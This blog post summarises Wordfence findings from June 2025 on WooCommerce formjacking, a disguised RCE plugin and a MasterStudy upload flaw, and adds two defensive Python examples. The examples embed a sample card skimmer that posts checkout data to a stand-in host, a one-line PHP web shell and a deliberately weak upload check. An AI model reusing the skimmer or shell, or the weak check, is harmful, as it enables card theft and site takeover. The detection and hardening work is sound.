Critical vulnerabilities in WordPress plugins – June 2025

To keep your WordPress website secure, and to keep it that way, you need a security plugin.
One reason is that such plugins report regularly on critical vulnerabilities in the plugins you might be running.
There are a few available, although my preference goes to Wordfence.
The Wordfence Threat Intelligence team has so far reported the following (two malware findings, one plugin vulnerability and its annual report):
Sophisticated formjacking malware targeting WooCommerce sites
The Wordfence Threat Intelligence team recently uncovered a sophisticated formjacking malware targeting WooCommerce sites. This malware injects a fake payment form into legitimate checkout processes and exfiltrates sensitive customer data to a remote Command & Control (C2) server.
Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site’s design and payment workflow, making it particularly difficult for site owners and users to detect.
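Because this variant blends into the real checkout instead of overlaying it, eyeballing the page is not a reliable check. What a site owner can baseline is the set of form fields the checkout renders and the hosts its scripts contact; an injected card form or an exfiltration endpoint then shows up as a diff. The script below is an added example (not Wordfence's code and not the sample they analysed): the checkout HTML, the field names and the look-alike CDN host name are all constructed for the example.

```python
"""Added example (not Wordfence's code): baseline the checkout page's form
fields and the hosts its scripts contact, so an injected card form or an
exfiltration endpoint shows up as a diff. The HTML, field names and host names
below are constructed for the example."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class CheckoutParser(HTMLParser):
    """Collects input names, external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.fields = []       # name attribute of every input/select/textarea
        self.script_srcs = []  # <script src=...>
        self.inline_js = []    # bodies of <script> blocks without src
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("input", "select", "textarea") and a.get("name"):
            self.fields.append(a["name"])
        elif tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


URL_RE = re.compile(r"""https?://[^\s'"()<>]+""")
CARD_FIELD_RE = re.compile(r"card|cc[_-]?num|cvv|cvc|expir", re.IGNORECASE)


def contacted_hosts(parser):
    """Hosts referenced by script src attributes or by URL literals in inline JS."""
    hosts = set()
    for url in parser.script_srcs + URL_RE.findall("\n".join(parser.inline_js)):
        host = urlparse(url).hostname
        if host:
            hosts.add(host)
    return hosts


def audit_checkout(html, expected_fields, allowed_hosts):
    """Return (severity, message) findings for anything outside the baseline."""
    p = CheckoutParser()
    p.feed(html)
    findings = []
    for name in sorted(set(p.fields) - set(expected_fields)):
        # A field outside the baseline that looks like card data is the
        # signature of an injected payment form.
        sev = "HIGH" if CARD_FIELD_RE.search(name) else "MEDIUM"
        findings.append((sev, f"unexpected checkout field '{name}'"))
    for host in sorted(contacted_hosts(p) - set(allowed_hosts)):
        findings.append(("HIGH", f"checkout scripts contact non-allowlisted host '{host}'"))
    return findings


# Baseline of a clean checkout (constructed): a few WooCommerce billing fields
# and the shop's own host.
EXPECTED_FIELDS = {"billing_first_name", "billing_email", "payment_method",
                   "woocommerce-process-checkout-nonce"}
ALLOWED_HOSTS = {"shop.example"}

# Constructed page: the real form plus an injected card form whose data is
# posted to a look-alike CDN host (made-up name).
INFECTED_HTML = """
<form name="checkout" action="https://shop.example/checkout/">
  <input type="text" name="billing_first_name">
  <input type="email" name="billing_email">
  <input type="hidden" name="woocommerce-process-checkout-nonce">
  <input type="radio" name="payment_method" value="bacs">
  <div class="wc-payment-form">
    <input type="text" name="wc_card_number" placeholder="Card number">
    <input type="text" name="wc_card_expiry" placeholder="MM / YY">
    <input type="text" name="wc_card_cvc" placeholder="CVC">
  </div>
</form>
<script src="https://shop.example/wp-includes/js/jquery/jquery.min.js"></script>
<script>
document.querySelector('.wc-payment-form').addEventListener('change', function () {
  fetch("https://cdn-woo-assets.example/collect", {method: "POST",
        body: JSON.stringify(Object.fromEntries(new FormData(document.forms.checkout)))});
});
</script>
"""

if __name__ == "__main__":
    for sev, msg in audit_checkout(INFECTED_HTML, EXPECTED_FIELDS, ALLOWED_HOSTS):
        print(sev, msg)
```

Run it against a saved copy of your live checkout page (fetch it as an anonymous visitor, since injected code is often served only to non-admins) and keep the baseline in version control; any new field or new host is worth a manual look before it is added to the allowlist.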
Malware Masquerades as Legitimate, Hidden WordPress Plugin with Remote Code Execution Capabilities
The Wordfence Threat Intelligence team recently discovered an interesting malware variant that appears in the file system as a normal WordPress plugin: it has a comment header, a handful of functions and a simple admin interface.
Just like previous examples we have seen, this piece of malware contains code that ensures it remains hidden in the administrator dashboard. It has a password extraction feature, which requires configuration through its own admin interface, an AJAX-based remote code execution mechanism and unfinished code suggesting it is still in development.
Arbitrary File Upload vulnerability in MasterStudy LMS Pro
On May 15th, 2025, we received a submission for an Arbitrary File Upload vulnerability in MasterStudy LMS Pro, a WordPress plugin with more than 15,000 estimated active installations. The MasterStudy Education WordPress theme from ThemeForest with more than 21,000 sales also includes the Pro plugin.
This vulnerability makes it possible for authenticated users such as subscribers to upload arbitrary files to a vulnerable site and achieve remote code execution in certain configurations, which is typically leveraged for a complete site takeover. Please note that this vulnerability only critically affects users who have enabled the “Media File Manager” and “Assignments” addons in the Pro plugin, both of which are disabled by default.
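The fix for this particular bug is the vendor's update, but the class of mistake is worth seeing in code. The example below is added here and is not MasterStudy's code: it shows a deliberately weak upload check, of the shape that lets a subscriber land a PHP file in a web-served directory, next to a hardened one. Roles, file names and contents are constructed; the role-to-capability mapping is the default WordPress `upload_files` assignment, and the executable-extension list is an assumption about what a typical PHP web server will execute.

```python
"""Added example (not MasterStudy's code): a weak upload check beside a
hardened one. Roles, file names and file contents are constructed."""
import os
import re
import secrets

ALLOWED_EXTENSIONS = {"jpg", "png", "pdf"}
ALLOWED_MIME = {"image/jpeg", "image/png", "application/pdf"}
MAGIC = {                      # leading bytes the content must actually have
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "pdf": b"%PDF-",
}
# Extensions a PHP web server may execute, anywhere in the name (assumed list).
EXECUTABLE_RE = re.compile(r"\.(php\d?|phtml|phar|htaccess)(\.|$)", re.IGNORECASE)
# Default WordPress roles that hold the upload_files capability.
UPLOAD_CAPABILITY_ROLES = {"administrator", "editor", "author"}


def weak_accept(role, filename, content_type, data):
    """Vulnerable pattern: any logged-in user, client-chosen MIME type, and only
    the last extension is looked at. 'shell.php.jpg' passes; whether it runs
    depends on the server configuration, which is the 'in certain
    configurations' caveat."""
    if role is None:
        return False
    if content_type not in ALLOWED_MIME:
        return False
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def hardened_accept(role, filename, content_type, data):
    """Returns the server-chosen name to store under, or None if rejected."""
    # 1. capability: a subscriber cannot upload at all
    if role not in UPLOAD_CAPABILITY_ROLES:
        return None
    # 2. basename only: no directory traversal through the client-supplied name
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        return None
    # 3. nothing executable anywhere in the name (shell.php.jpg, x.phtml, ...)
    if EXECUTABLE_RE.search(base):
        return None
    # 4. last extension must be on the allowlist
    _, sep, ext = base.rpartition(".")
    ext = ext.lower()
    if not sep or ext not in ALLOWED_EXTENSIONS:
        return None
    # 5. the content must match the extension; the client's header is ignored
    if not data.startswith(MAGIC[ext]):
        return None
    # 6. store under a random server-chosen name, never the uploaded one
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed inputs for a quick run.
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP = b"<?php system($_GET['c']); ?>"

if __name__ == "__main__":
    print("weak accepts shell.php.jpg from subscriber:",
          weak_accept("subscriber", "shell.php.jpg", "image/jpeg", PHP))
    print("hardened rejects it:",
          hardened_accept("author", "shell.php.jpg", "image/jpeg", PHP) is None)
    print("hardened stores a real JPEG as:",
          hardened_accept("author", "photo.jpg", "image/jpeg", JPEG))
```

Magic-byte checks stop a bare PHP file but not a JPEG/PHP polyglot, which is why steps 3 and 6 matter as much as step 5, and why the upload directory itself should be configured so the web server never hands its contents to the PHP interpreter.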
Annual WordPress security report for 2024
In case you missed it, Wordfence just published its annual WordPress security report for 2024. Read it now to learn more about the evolving risk landscape of WordPress so you can keep your sites protected in 2025 and beyond.
All the best,
Luc
